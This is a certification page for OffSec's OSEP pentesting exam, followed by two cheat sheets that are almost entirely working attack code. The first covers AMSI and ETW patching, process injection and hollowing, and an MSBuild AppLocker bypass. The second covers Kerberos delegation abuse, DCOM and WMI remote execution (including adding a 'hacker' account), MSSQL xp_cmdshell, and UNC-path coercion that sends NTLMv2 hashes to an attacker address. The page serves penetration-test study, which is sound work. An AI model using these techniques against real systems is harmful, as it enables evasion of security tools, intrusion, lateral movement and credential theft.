OSEP
OffSec

Offensive Security Experienced Pentester

Expert 48hr practical exam + report Pass: 100+ points $1,499

Advanced evasion, custom exploits, AD attacks. Continuation of OSCP.

Official Page
IssuerOffSec
Format48hr practical exam + report
Duration72 hours total
Pass Score100+ points
Valid For3y
Overview Syllabus (7) Tools (7) Cheat Sheets (2) Labs (1)
Cheat Sheets
AV/EDR Evasion Techniques

AMSI Bypass Techniques

# PowerShell — Reflection patch
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Memory patch (C#)
var amsi = LoadLibrary("amsi.dll");
var func = GetProcAddress(amsi, "AmsiScanBuffer");
// Patch first byte with 0xC3 (RET)

# Obfuscated version
$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
$b=$a.GetField('amsiInitFailed','NonPublic,Static');
$b.SetValue($null,$true)

ETW Patching

# Patch EtwEventWrite to return immediately
$EtwEventWrite = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (Get-ProcAddress ntdll.dll EtwEventWrite), (Get-DelegateType @([IntPtr],[Int32],[IntPtr],[Int32],[IntPtr]) ([Int32]))
)
# Replace first bytes with 0xC3

# PowerShell ETW disable
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null), 0)

Process Injection (C#)

[DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int dwAccess, bool bInherit, int pid);
[DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx(IntPtr hProc, IntPtr addr, uint size, uint type, uint protect);
[DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr hProc, IntPtr addr, byte[] buf, uint size, out uint written);
[DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProc, IntPtr attr, uint size, IntPtr func, IntPtr param, uint flags, IntPtr id);

// 1. OpenProcess(0x001F0FFF, false, pid)
// 2. VirtualAllocEx(hProc, 0, (uint)shellcode.Length, 0x3000, 0x40)
// 3. WriteProcessMemory(hProc, addr, shellcode, ...)
// 4. CreateRemoteThread(hProc, 0, 0, addr, 0, 0, 0)

Process Hollowing Steps

# 1. Create suspended process (svchost.exe, explorer.exe)
CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", ..., CREATE_SUSPENDED, ...)

# 2. Read PEB to get image base
ZwQueryInformationProcess → PROCESS_BASIC_INFORMATION

# 3. Unmap original image
ZwUnmapViewOfSection(hProc, imageBase)

# 4. Allocate memory at original base
VirtualAllocEx(hProc, imageBase, payloadSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

# 5. Write payload headers and sections
WriteProcessMemory per section

# 6. Set new entry point in context
GetThreadContext → SetThreadContext (EAX/RAX = EP)
ResumeThread

AppLocker / CLM Bypass

# Check AppLocker rules
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# CLM check
$ExecutionContext.SessionState.LanguageMode  # should be ConstrainedLanguage

# Bypass using MSBuild

  
    
  
  
    
      using System.Diagnostics; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
      public class ClassTask : Task {
        public override bool Execute() { Process.Start("cmd.exe", "/c whoami > C:\\out.txt"); return true; }
      }
    
  

# Run: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
Always test payloads in a controlled environment before using in actual engagements. Modifying AMSI in production can crash processes.
Active Directory Lateral Movement

Kerberos Delegation Attacks

# Unconstrained delegation — find hosts
Get-DomainComputer -Unconstrained | select dnshostname

# Force DC ticket to unconstrained server (SpoolService trick)
.\SpoolSample.exe DC01 unconstrained_host
# Then extract TGT from memory
.\Rubeus.exe monitor /monitorinterval:5 /targetuser:DC01$

# Constrained delegation — find accounts
Get-DomainUser -TrustedToAuth | select samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select dnshostname,msds-allowedtodelegateto

# S4U2Self + S4U2Proxy
.\Rubeus.exe s4u /user:svc_constrained /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target /ptt

DCOM Lateral Movement

# MMC20.Application
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "target"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\out.txt", "7")

# ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID([Guid]"9BA05972-F6A8-11CF-A442-00A0C90A8F39", "target"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\out.txt", "C:\Windows\System32", $null, 0)

WMI Lateral Movement

# wmiexec.py
wmiexec.py domain/Administrator:pass@target

# PowerShell WMI
Invoke-WMIMethod -ComputerName target -Class Win32_Process -Name Create -ArgumentList "cmd /c whoami > C:\out.txt"

# PSExec via WMI
$wmi = [wmiclass]"\\target\root\cimv2:win32_process"
$wmi.Create("cmd.exe /c net user hacker P@ss123 /add")

MSSQL Attacks

# Enumerate MSSQL instances
Get-SQLInstanceDomain -Verbose
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

# UNC path coercion for NTLMv2
EXEC xp_dirtree '\\10.10.14.x\share';
# Capture with Responder

# Linked server enum
SELECT * FROM sys.servers;
EXEC ('SELECT @@servername') AT [LINKED_SERVER];
EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER];
For MSSQL SA access, always check if xp_cmdshell can chain through multiple linked servers for lateral movement to isolated segments.